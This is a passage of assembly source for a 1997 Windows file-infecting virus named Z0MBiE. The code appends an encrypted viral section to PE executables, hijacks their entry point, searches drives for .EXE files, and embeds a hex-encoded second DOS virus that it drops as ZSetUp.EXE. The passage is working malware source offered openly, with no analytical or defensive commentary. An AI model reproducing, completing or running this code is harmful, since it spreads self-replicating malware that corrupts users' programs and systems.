pe header - - mov ecx, 4 - lea edx, peheaderoffset[ebp] - call readfile - -; goto the pe header - mov edx, peheaderoffset[ebp] - call seekfile - -; read in enuff to calculate the full size of the pe header and object table - - mov ecx, 256 - lea edx, peheader[ebp] - call readfile - -; make sure it is a pe header and is not already infected - cmp dword ptr peheader[ebp],'EP' - jne @@close - cmp word ptr peheader[ebp] + 4ch, FILE_ID - je @@close - cmp dword ptr peheader[ebp] + 52, 00400000h - jne @@close - -; go back to the start of the pe header - mov edx, peheaderoffset[ebp] - call seekfile - -; read in the whole pe header and object table - lea edx, peheader[ebp] - mov ecx, headersize[ebp] - cmp ecx, maxbufsize - ja @@close - call readfile - - mov word ptr peheader[ebp] + 4ch, FILE_ID - -; locate offset of object table - xor eax, eax - mov ax, NtHeaderSize[ebp] - add eax, 18h - mov objecttableoffset[ebp],eax - -; calculate the offset of the last (null) object in the object table - mov esi, objecttableoffset[ebp] - lea eax, peheader[ebp] - add esi, eax - xor eax, eax - mov ax, numObj[ebp] - mov ecx, 40 - xor edx, edx - mul ecx - add esi, eax - - inc numObj[ebp] ; inc the number of objects - - lea edi, newobject[ebp] - xchg edi,esi - -; calculate the Relative Virtual Address (RVA) of the new object - - mov eax, [edi-5*8+8] - add eax, [edi-5*8+12] - mov ecx, objalign[ebp] - xor edx,edx - div ecx - inc eax - mul ecx - mov RVA[ebp], eax - -; calculate the physical size of the new object - mov ecx, filealign[ebp] - mov eax, viriisize - xor edx, edx - div ecx - inc eax - mul ecx - mov physicalsize[ebp],eax - -; calculate the virtual size of the new object - mov ecx, objalign[ebp] - mov eax, virtsize - xor edx,edx - div ecx - inc eax - mul ecx - mov virtualsize[ebp],eax - -; calculate the physical offset of the new object - mov eax,[edi-5*8+20] - add eax,[edi-5*8+16] - mov ecx, filealign[ebp] - xor edx,edx - div ecx - inc eax - mul ecx - mov physicaloffset[ebp],eax - -; update the image size (the size in memory) of the file - mov eax, virtsize - add eax, imagesize[ebp] - mov ecx, objalign[ebp] - xor edx, edx - div ecx - inc eax - mul ecx - mov imagesize[ebp],eax - -; copy the new object into the object table - mov ecx, 40/4 - rep movsd - -; calculate the entrypoint RVA - mov eax, RVA[ebp] - - mov ebx, entrypointRVA[ebp] - mov entrypointRVA[ebp], eax - - sub eax, ebx - -; Set the value needed to return to the host - mov subme[ebp], eax - -; go back to the start of the pe header - mov edx, peheaderoffset[ebp] - call seekfile - -; write the pe header and object table to the file - mov ecx, headersize[ebp] - lea edx, peheader[ebp] - call writefile - -; move to the physical offset of the new object - mov edx, physicaloffset[ebp] - call seekfile - -; write the virus code to the new object - - call random - mov xorword[ebp], eax - - lea edx, start[ebp] - mov ecx, decrsize - call writefile - - lea esi, codestart[ebp] - lea edi, buf[ebp] - mov ecx, cryptn -@@1: lodsd - xor eax, xorword[ebp] - neg eax - stosd - loop @@1 - - lea edx, buf[ebp] - mov ecx, viriisize-decrsize - call writefile - -@@close: call closefile - -@@exit: ret - -; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 32-bit random number generator ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ - - ; output: eax=rnd - ; zf=rnd(2) - -random: call random16bit - shl eax, 16 - -random16bit: push ebx - mov bx, 1234h -rndword equ word ptr $-2 - in al, 40h - xor bl, al - in al, 40h - add bh, al - in al, 41h - sub bl, al - in al, 41h - xor bh, al - in al, 42h - add bl, al - in al, 42h - sub bh, al - mov rndword[ebp], bx - xchg bx, ax - pop ebx - test al, 1 - ret - - ; input: eax - ; output: eax=rnd(eax) - ; zf=rnd(2) - -rnd: push ebx - push edx - xchg ebx, eax - call random - xor edx, edx - div ebx - xchg edx, eax - pop edx - pop ebx - test al, 1 - ret - - -codesize equ $-start - -; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ data area ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ - -kernel_sign: pushfd ; <- kernel - cld - push eax - push ebx - push edx -kernel_sign_size equ $-kernel_sign - -kernel_call dd ? - -names: db 'ExitProcess',0 - db 'FindFirstFileA',0 - db 'FindNextFileA',0 - db 'CreateFileA',0 - db 'SetFilePointer',0 - db 'ReadFile',0 - db 'WriteFile',0 - db 'CloseHandle',0 - db 'GetCurrentDirectoryA',0 - db 'SetCurrentDirectoryA',0 - db 'GetWindowsDirectoryA',0 - db 'GetCommandLineA',0 - db 'WinExec',0 - db 'SetPriorityClass',0 - db 'GetModuleHandleA',0 - db 0 - -fns: -def_fn macro name -_&name&: db 68h -fn_&name& dd ? - jmp kernel_call[ebp] - endm - -def_fn ExitProcess -def_fn FindFirstFileA -def_fn FindNextFileA -def_fn CreateFileA -def_fn SetFilePointer -def_fn ReadFile -def_fn WriteFile -def_fn CloseHandle -def_fn GetCurrentDirectoryA -def_fn SetCurrentDirectoryA -def_fn GetWindowsDirectoryA -def_fn GetCommandLineA -def_fn WinExec -def_fn SetPriorityClass -def_fn GetModuleHandleA - -bytesread dd ? - -drive_c db 'C:\',0 -drive_d db 'D:\',0 -drive_e db 'E:\',0 -drive_f db 'F:\',0 - -exefiles db '*.EXE',0 -dirfiles db '*.',0 - -prev_dir db '..',0 - -win32_data_thang: -fileattr dd 0 -createtime dd 0,0 -lastaccesstime dd 0,0 -lastwritetime dd 0,0 -filesize dd 0,0 -resv dd 0,0 -fullname db 'Z0MB.EXE',256-8 dup (0) -realname db 256 dup (0) - -handle dd ? - -peheaderoffset dd ? -objecttableoffset dd ? - -newobject: ;1234567 8 -oname db '.Z0MBiE',0 -virtualsize dd 0 -RVA dd 0 -physicalsize dd 0 -physicaloffset dd 0 -reserved dd 0,0,0 -objectflags db 40h,0,0,0c0h - -; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ messages ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ - - db 13,10,'Z0MBiE 1.01 (c) 1997',13,10 - db 'My 2nd virii for mustdie',13,10 - db 'Tnx to S.S.R.',13,10 - -m1 macro n - if n ge 100000 - db n / 10000/10 mod 10 + '0' - else - db '.' - endif - if n ge 10000 - db n / 10000 mod 10 + '0' - else - db '.' - endif - if n ge 1000 - db n / 1000 mod 10 + '0' - else - db '.' - endif - db n / 100 mod 10 + '0' - db n / 10 mod 10 + '0' - db n / 1 mod 10 + '0',13,10 - endm - -; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ -zsetup db '\ZSetUp.EXE',0 -z: -include z.inc ; Z0MBiE.1922 -z_size equ $-z -; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ - - db 13,10 - db 'code..............' -m1 codesize - db 'viriisize.........' -m1 viriisize - db 'virtsize..........' -m1 virtsize - -peheader: -signature dd 0 -cputype dw 0 -numObj dw 0 - dd 3 dup (0) -NtHeaderSize dw 0 -Flags dw 0 - dd 4 dup (0) -entrypointRVA dd 0 - dd 3 dup (0) -objalign dd 0 -filealign dd 0 - dd 4 dup (0) -imagesize dd 0 -headersize dd 0 -peheader_size equ $-peheader - - align 4 -viriisize equ $-start - -infdir db 256 dup (?) - -maxbufsize equ 4096 -buf db maxbufsize dup (?) - -virtsize equ $-start - end start - -; - -[Z.INC]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 - -abc_size equ 1922 ; size in bytes -abc_num equ 1922 ; size in elements - -abc db 0e9h,010h,001h,026h,0a0h,028h,000h,0f6h,0d0h,02eh,030h,006h,022h,001h -db 0beh,02bh,001h,08bh,0feh,0b9h,008h,000h,02eh,0ach,040h,0d1h,0e3h,00bh,0d8h -db 0e2h,0f7h,02eh,088h,01dh,047h,081h,0ffh,0adh,008h,075h,0eah,0ebh,000h,0e8h -db 056h,006h,0b8h,081h,0f0h,0cdh,013h,03dh,08ch,092h,074h,003h,0e8h,0d8h,000h -db 08ch,0c1h,083h,0c1h,010h,0b8h,034h,012h,003h,0c1h,08eh,0d0h,0bch,034h,012h -db 0b8h,034h,012h,003h,0c1h,050h,068h,034h,012h,033h,0c0h,0cbh,053h,0bbh,034h -db 012h,0e4h,040h,032h,0d8h,0e4h,040h,002h,0f8h,0e4h,041h,02ah,0d8h,0e4h,041h -db 032h,0f8h,0e4h,042h,002h,0d8h,0e4h,042h,02ah,0f8h,02eh,089h,01eh,058h,001h -db 093h,05bh,0a8h,001h,0c3h,053h,052h,093h,0e8h,0d4h,0ffh,033h,0d2h,0f7h,0f3h -db 092h,05ah,05bh,0a8h,001h,0c3h,051h,0b1h,059h,0e8h,04eh,000h,02eh,088h,02eh -db 0afh,001h,041h,0e8h,045h,000h,02eh,088h,02eh,0b5h,001h,041h,0e8h,03ch,000h -db 02eh,088h,02eh,0bbh,001h,059h,0c3h,090h,051h,0b9h,059h,000h,0e8h,03ah,000h -db 041h,0b5h,012h,0e8h,034h,000h,041h,0b5h,012h,0e8h,02eh,000h,059h,0c3h,051h -db 0b1h,059h,02eh,08ah,02eh,0afh,001h,080h,0e5h,08fh,080h,0cdh,030h,0e8h,01bh -db 000h,041h,0b5h,033h,0e8h,015h,000h,041h,0b5h,033h,0e8h,00fh,000h,059h,0c3h -db 066h,050h,052h,0e8h,014h,000h,0ech,08ah,0e8h,05ah,066h,058h,0c3h,066h,050h -db 052h,0e8h,007h,000h,08ah,0c5h,0eeh,05ah,066h,058h,0c3h,066h,0b8h,000h,000h -db 000h,080h,08ah,0c1h,024h,0fch,0bah,0f8h,00ch,066h,0efh,080h,0c2h,004h,08ah -db 0c1h,024h,003h,002h,0d0h,0c3h,01eh,006h,00eh,01fh,0fah,0fch,0e8h,070h,0ffh -db 0a0h,0afh,001h,0feh,0c0h,074h,058h,0e8h,0b8h,000h,075h,053h,0e8h,053h,000h -db 074h,00bh,0e8h,074h,000h,074h,006h,0e8h,07ch,000h,074h,001h,0c3h,0e8h,086h -db 0ffh,0b8h,042h,000h,0e8h,03bh,0ffh,003h,0e8h,083h,0c5h,00fh,083h,0e5h,0f0h -db 0c1h,0edh,004h,08ch,0c0h,003h,0c5h,02dh,010h,000h,08eh,0c0h,0bfh,000h,001h -db 0c6h,006h,082h,008h,0eah,0c7h,006h,083h,008h,017h,003h,08ch,006h,085h,008h -db 08ch,006h,0b6h,005h,0beh,000h,001h,0b9h,007h,008h,0f3h,0a4h,0e8h,035h,003h -db 0e8h,032h,0ffh,033h,0c0h,007h,01fh,0c3h,068h,000h,0c0h,007h,033h,0ffh,032h -db 0d2h,026h,08ah,075h,002h,0d1h,0e2h,073h,002h,0b6h,080h,081h,0eah,069h,008h -db 033h,0c0h,08bh,0efh,0b9h,025h,004h,0f3h,0afh,074h,004h,03bh,0fah,076h,0f3h -db 0c3h,0b8h,030h,011h,0b7h,002h,0cdh,010h,08ch,0c0h,03dh,000h,0c0h,0c3h,068h -db 000h,0c0h,007h,033h,0ffh,0b9h,00eh,000h,032h,0c0h,0f3h,0aeh,075h,015h,0b9h -db 010h,000h,0f3h,0aeh,026h,081h,07dh,0ffh,07eh,081h,075h,008h,026h,081h,07dh -db 00dh,07eh,0ffh,074h,006h,081h,0ffh,000h,0f0h,076h,0dch,08bh,0efh,0c3h,0b4h -db 013h,0cdh,02fh,08ch,0c1h,02eh,089h,01eh,02bh,003h,02eh,08ch,006h,02dh,003h -db 0cdh,02fh,081h,0f9h,000h,0f0h,0c3h,03dh,081h,0f0h,074h,019h,03dh,000h,04bh -db 074h,00fh,080h,0fch,043h,074h,00ah,080h,0fch,03dh,074h,005h,0eah,000h,000h -db 000h,000h,0e8h,048h,000h,0ebh,0f6h,0b8h,08ch,092h,0cfh,03dh,081h,0f0h,074h -db 0f7h,0e8h,0a2h,0feh,0e8h,089h,002h,02eh,0a3h,05ch,005h,0e8h,082h,0feh,09ch -db 09ah,000h,000h,000h,000h,09ch,0e8h,08eh,0feh,02eh,080h,03eh,05dh,005h,002h -db 075h,00dh,026h,081h,03fh,04dh,05ah,075h,003h,0e8h,0e4h,001h,0e8h,012h,002h -db 0e8h,060h,002h,0e8h,05dh,0feh,09dh,0cah,002h,000h,09ch,02eh,0ffh,01eh,00ah -db 003h,0c3h,0e8h,065h,0feh,02eh,0c6h,006h,0abh,001h,0c3h,060h,01eh,006h,0fch -db 0b8h,000h,03dh,0e8h,0e6h,0ffh,00fh,082h,066h,001h,093h,0b4h,03fh,00eh,01fh -db 0bah,087h,008h,0b9h,040h,000h,0e8h,0d4h,0ffh,03bh,0c1h,00fh,085h,04dh,001h -db 0a1h,087h,008h,03dh,04dh,05ah,074h,007h,03dh,05ah,04dh,00fh,085h,03eh,001h -db 080h,03eh,099h,008h,069h,00fh,084h,035h,001h,0b8h,000h,042h,033h,0c9h,08bh -db 016h,08fh,008h,0c1h,0e2h,004h,0e8h,0a7h,0ffh,0b4h,03fh,0bah,0bdh,003h,0b9h -db 002h,000h,0e8h,09ch,0ffh,03bh,0c1h,00fh,085h,015h,001h,0b8h,034h,012h,040h -db 00fh,084h,00dh,001h,053h,0b8h,020h,012h,0cdh,02fh,026h,08ah,01dh,0b8h,016h -db 012h,0cdh,02fh,05bh,026h,08bh,055h,013h,026h,08bh,045h,011h,00ah,0c0h,00fh -db 084h,0f5h,000h,0b9h,0e8h,003h,0f7h,0f1h,00bh,0d2h,00fh,084h,0eah,000h,026h -db 0c7h,045h,002h,002h,000h,00eh,007h,0a1h,08bh,008h,048h,0b9h,000h,002h,0f7h -db 0e1h,003h,006h,089h,008h,083h,0d2h,000h,08bh,0f0h,08bh,0fah,0b8h,002h,042h -db 099h,033h,0c9h,0e8h,041h,0ffh,03bh,0c6h,00fh,085h,0bah,000h,03bh,0d7h,00fh -db 085h,0b4h,000h,005h,00fh,000h,083h,0d2h,000h,024h,0f0h,02bh,0f0h,029h,036h -db 089h,008h,050h,052h,0c1h,0e8h,004h,0c1h,0e2h,00ch,00bh,0c2h,02bh,006h,08fh -db 008h,02dh,010h,000h,08bh,0c8h,087h,00eh,09dh,008h,089h,00eh,04bh,001h,0b9h -db 003h,001h,087h,00eh,09bh,008h,089h,00eh,051h,001h,08bh,0c8h,087h,00eh,095h -db 008h,089h,00eh,041h,001h,0b9h,010h,00ah,087h,00eh,097h,008h,089h,00eh,048h -db 001h,081h,006h,091h,008h,0a1h,000h,083h,006h,08bh,008h,01eh,083h,006h,089h -db 008h,03bh,0c6h,006h,099h,008h,069h,0b8h,000h,042h,059h,05ah,0e8h,0cfh,0feh -db 0e8h,05dh,000h,0b4h,040h,0bah,000h,001h,0b9h,02bh,000h,0e8h,0c1h,0feh,0beh -db 02bh,001h,0bfh,0c7h,008h,0b9h,008h,000h,0ach,092h,0bdh,008h,000h,033h,0c0h -db 0d0h,0e2h,0d1h,0d0h,048h,0aah,04dh,075h,0f5h,0e2h,0eeh,0b4h,040h,0bah,0c7h -db 008h,0b9h,040h,000h,0e8h,09bh,0feh,081h,0feh,0adh,008h,072h,0d7h,0b8h,000h -db 042h,099h,033h,0c9h,0e8h,08ch,0feh,0b4h,040h,0bah,087h,008h,0b9h,040h,000h -db 0e8h,081h,0feh,0b4h,03eh,0e8h,07ch,0feh,007h,01fh,061h,02eh,0c6h,006h,0abh -db 001h,090h,0e8h,0c9h,0fch,0c3h,0bfh,084h,007h,0b0h,0c3h,0aah,0b9h,0fdh,000h -db 033h,0c0h,0f3h,0aah,0c7h,006h,007h,001h,0f6h,0d0h,0b0h,008h,0e6h,070h,0e4h -db 071h,03ch,00ah,075h,028h,0c7h,006h,007h,001h,0b0h,000h,0b8h,009h,000h,0e8h -db 070h,0fch,096h,06bh,0f6h,012h,081h,0c6h,0e2h,006h,0b9h,002h,000h,0adh,097h -db 081h,0c7h,084h,007h,0a4h,0adh,097h,081h,0c7h,084h,007h,066h,0a5h,0e2h,0efh -db 0c3h,060h,01eh,006h,033h,0f6h,08eh,0deh,0c4h,09ch,084h,000h,00bh,0dbh,074h -db 01eh,0b8h,081h,0f0h,0cdh,021h,03dh,08ch,092h,074h,014h,02eh,089h,01eh,00ah -db 003h,02eh,08ch,006h,00ch,003h,0c7h,084h,084h,000h,0f5h,002h,08ch,08ch,086h -db 000h,007h,01fh,061h,0c3h,060h,0bah,034h,012h,032h,0f6h,0c1h,0e2h,004h,08dh -db 07fh,00ch,0b9h,00ah,000h,032h,0c0h,0fch,0f3h,0aeh,075h,033h,0bdh,053h,006h -db 0b9h,00bh,000h,08bh,0f5h,08bh,0fbh,02eh,0ach,03ch,0b0h,074h,004h,03ch,080h -db 073h,005h,026h,038h,005h,075h,011h,047h,0e2h,0eeh,08bh,0fbh,0b0h,0e5h,0aah -db 033h,0c0h,0b9h,01fh,000h,0f3h,0aah,0ebh,009h,083h,0c5h,00bh,081h,0fdh,0e2h -db 006h,075h,0d0h,083h,0c3h,020h,04ah,075h,0bah,061h,0c3h,050h,056h,057h,01eh -db 006h,02eh,0c5h,036h,02bh,003h,068h,034h,012h,007h,0bfh,082h,008h,08ah,004h -db 026h,086h,005h,088h,004h,046h,047h,081h,0ffh,087h,008h,075h,0f1h,007h,01fh -db 05fh,05eh,058h,0c3h,00dh,00ah,00ah,05ah,030h,04dh,042h,069h,045h,060h,031h -db 036h,036h,038h,020h,076h,031h,02eh,030h,030h,020h,028h,063h,029h,020h,031h -db 039h,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,054h,06eh,078h -db 020h,074h,06fh,020h,053h,02eh,053h,02eh,052h,02eh,00dh,00ah,053h,068h,061h -db 064h,06fh,077h,052h,041h,04dh,02fh,056h,069h,072h,074h,075h,061h,06ch,020h -db 050h,072h,06fh,063h,065h,073h,073h,020h,049h,06eh,066h,065h,063h,074h,06fh -db 072h,00dh,00ah,053h,068h,061h,064h,06fh,077h,052h,041h,04dh,020h,054h,065h -db 063h,068h,06eh,06fh,06ch,06fh,067h,079h,020h,028h,063h,029h,020h,031h,039h -db 039h,036h,02ch,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,041h -db 044h,049h,04eh,046h,0f9h,0a3h,0a0h,0a2h,0adh,0aeh,041h,049h,044h,053h,0f9h -db 0afh,0aeh,0a3h,0a0h,0adh,0ech,041h,056h,050h,0f9h,0f9h,0e1h,0a0h,0aah,0e1h -db 0f9h,0f9h,057h,045h,042h,0f9h,0f9h,0e3h,0a9h,0aeh,0a1h,0aeh,0aah,044h,052h -db 057h,045h,042h,0f9h,0e2h,0aeh,0a6h,0a5h,0f9h,0f9h,0e5h,0e3h,0a9h,0adh,0efh -db 0f9h,0f9h,0b0h,0b0h,0b0h,0f9h,0a4h,0a5h,0e0h,0ech,0ach,0aeh,0f9h,043h,050h -db 050h,0adh,0a5h,0adh,0a0h,0a2h,0a8h,0a6h,0e3h,043h,020h,020h,053h,02dh,049h -db 043h,045h,0f9h,0e0h,0e3h,0abh,0a5h,0a7h,054h,044h,0f9h,0ach,0a0h,0e1h,0e2h -db 0f9h,0a4h,0a0h,0a9h,044h,045h,042h,055h,047h,0f9h,0f9h,0a3h,0e3h,0a4h,0f9h -db 057h,045h,042h,037h,030h,038h,030h,031h,0edh,0e2h,0aeh,043h,041h,0f9h,0ach -db 0aeh,0f1h,0f9h,0f9h,041h,056h,0f9h,015h,000h,01eh,051h,000h,0f1h,060h,01eh -db 009h,0bdh,000h,0a3h,0f7h,000h,0fah,005h,074h,00bh,006h,000h,0b4h,022h,000h -db 01eh,0f7h,0ebh,0f1h,0b3h,000h,080h,0dfh,000h,024h,016h,002h,03dh,032h,000h -db 01eh,05eh,000h,095h,025h,0b8h,001h,0c5h,000h,033h,0e1h,000h,0e9h,0c9h,004h -db 0b1h,03eh,000h,0fah,05ah,000h,00bh,04ch,013h,08bh,0cdh,000h,080h,0f9h,000h -db 07fh,0dfh,0e0h,059h,009h,000h,02eh,025h,000h,025h,0e5h,009h,0e8h,037h,000h -db 0e8h,063h,000h,0a4h,0f8h,002h,04bh,009h,000h,050h,025h,000h,025h,052h,084h -db 000h,043h,000h,080h,06fh,000h,04eh,09ah,044h,003h,01ah,000h,050h,046h,000h -db 0adh,0cbh,033h,0c0h,085h,000h,0a1h,0a1h,000h,01bh,0fdh,006h,0a3h,036h,000h -db 0b8h,052h,000h,05bh,0c6h,0e0h,050h,0b2h,000h,09ch,0deh,000h,04eh,0e3h,0c9h -db 08eh,007h,000h,08eh,023h,000h,083h,008h,0a2h,002h,0b3h,000h,091h,0dfh,000h -db 059h,0feh,015h,003h,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh -db 03fh,03fh,03fh